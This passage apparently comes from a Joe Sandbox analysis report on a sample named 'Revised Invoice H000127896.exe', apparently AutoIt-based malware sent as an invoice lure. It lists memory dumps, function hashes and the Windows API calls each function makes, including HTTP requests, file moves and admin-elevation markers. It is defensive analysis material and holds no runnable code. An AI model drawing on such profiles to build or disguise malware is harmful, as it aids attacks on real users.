                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                              • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                              • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                              • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ClearVariant
                              • String ID:
                              • API String ID: 1473721057-0
                              • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                              • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                              • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                              • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _memmove$_memcmp
                              • String ID: '$\$h
                              • API String ID: 2205784470-1303700344
                              • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                              • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                              • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                              • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                              APIs
                              • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                              • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                              • VariantClear.OLEAUT32 ref: 0045EA6D
                              • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                              • __swprintf.LIBCMT ref: 0045EC33
                              • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                              Strings
                              • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Variant$InitTime$ClearCopySystem__swprintf
                              • String ID: %4d%02d%02d%02d%02d%02d
                              • API String ID: 2441338619-1568723262
                              • Opcode ID: c256a0e8f79103727635468c6c39d920c699b266699b53e39892a4f9942b48fe
                              • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                              • Opcode Fuzzy Hash: c256a0e8f79103727635468c6c39d920c699b266699b53e39892a4f9942b48fe
                              • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                              APIs
                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                              • Sleep.KERNEL32(0000000A), ref: 0042C67F
                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Interlocked$DecrementIncrement$Sleep
                              • String ID: @COM_EVENTOBJ
                              • API String ID: 327565842-2228938565
                              • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                              • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                              • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                              • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                              APIs
                              • VariantClear.OLEAUT32(?), ref: 0047031B
                              • VariantClear.OLEAUT32(?), ref: 0047044F
                              • VariantInit.OLEAUT32(?), ref: 004704A3
                              • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                              • VariantClear.OLEAUT32(?), ref: 00470516
                                • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                              • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                              • VariantClear.OLEAUT32(00000000), ref: 0047060D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Variant$Clear$Copy$CallDispFuncInit
                              • String ID: H
                              • API String ID: 3613100350-2852464175
                              • Opcode ID: a0993396c5b8998c97eda62eb292956ea80afa76050d6468dceab7f561fa4670
                              • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                              • Opcode Fuzzy Hash: a0993396c5b8998c97eda62eb292956ea80afa76050d6468dceab7f561fa4670
                              • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                              APIs
                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                              • DestroyWindow.USER32(?), ref: 00426F50
                              • UnregisterHotKey.USER32(?), ref: 00426F77
                              • FreeLibrary.KERNEL32(?), ref: 0042701F
                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                              • String ID: close all
                              • API String ID: 4174999648-3243417748
                              • Opcode ID: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
                              • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                              • Opcode Fuzzy Hash: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
                              • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                              APIs
                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                              • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                              • String ID:
                              • API String ID: 1291720006-3916222277
                              • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                              • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                              • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                              • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                              APIs
                              • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                              • IsMenu.USER32(?), ref: 0045FC5F
                              • CreatePopupMenu.USER32 ref: 0045FC97
                              • GetMenuItemCount.USER32(?), ref: 0045FCFD
                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Menu$Item$CountCreateInfoInsertPopup
                              • String ID: 0$2
                              • API String ID: 93392585-3793063076
                              • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                              • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                              • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                              • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                              APIs
                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                              • VariantClear.OLEAUT32(?), ref: 00435320
                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                              • VariantClear.OLEAUT32(?), ref: 004353B3
                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                              • String ID: crts
                              • API String ID: 586820018-3724388283
                              • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                              • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                              • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                              • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                              APIs
                                • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Revised Invoice H000127896.exe,0040F545,C:\Users\user\Desktop\Revised Invoice H000127896.exe,004A90E8,C:\Users\user\Desktop\Revised Invoice H000127896.exe,?,0040F545), ref: 0041013C
                              • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                              • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                              • _wcscat.LIBCMT ref: 0044BCAF
                              • _wcslen.LIBCMT ref: 0044BCBB
                              • _wcslen.LIBCMT ref: 0044BCD1
                              • SHFileOperationW.SHELL32(?), ref: 0044BD17
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                              • String ID: \*.*
                              • API String ID: 2326526234-1173974218
                              • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                              • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                              • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                              • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                              APIs
                                • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                              • _wcslen.LIBCMT ref: 004335F2
                              • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                              • GetLastError.KERNEL32 ref: 0043362B
                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                              • _wcsrchr.LIBCMT ref: 00433666
                                • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                              • String ID: \
                              • API String ID: 321622961-2967466578
                              • Opcode ID: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                              • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                              • Opcode Fuzzy Hash: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                              • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: __wcsnicmp
                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                              • API String ID: 1038674560-2734436370
                              • Opcode ID: 7c13aa0513e4bb2138c96398a5a2566d58b08304d963883aeef11e8644bf4991
                              • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                              • Opcode Fuzzy Hash: 7c13aa0513e4bb2138c96398a5a2566d58b08304d963883aeef11e8644bf4991
                              • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                              APIs
                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                              • __lock.LIBCMT ref: 00417981
                                • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                              • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                              • __lock.LIBCMT ref: 004179A2
                              • ___addlocaleref.LIBCMT ref: 004179C0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                              • String ID: KERNEL32.DLL$pI
                              • API String ID: 637971194-197072765
                              • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                              • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                              • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                              • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _memmove$_malloc
                              • String ID:
                              • API String ID: 1938898002-0
                              • Opcode ID: 1f9281079767c86d8b96628a3580c8a8d8da7ec8fe09033d6c47d2aab1b684b9
                              • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                              • Opcode Fuzzy Hash: 1f9281079767c86d8b96628a3580c8a8d8da7ec8fe09033d6c47d2aab1b684b9
                              • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                              APIs
                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                              • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                              • _memmove.LIBCMT ref: 0044B555
                              • _memmove.LIBCMT ref: 0044B578
                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                              • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
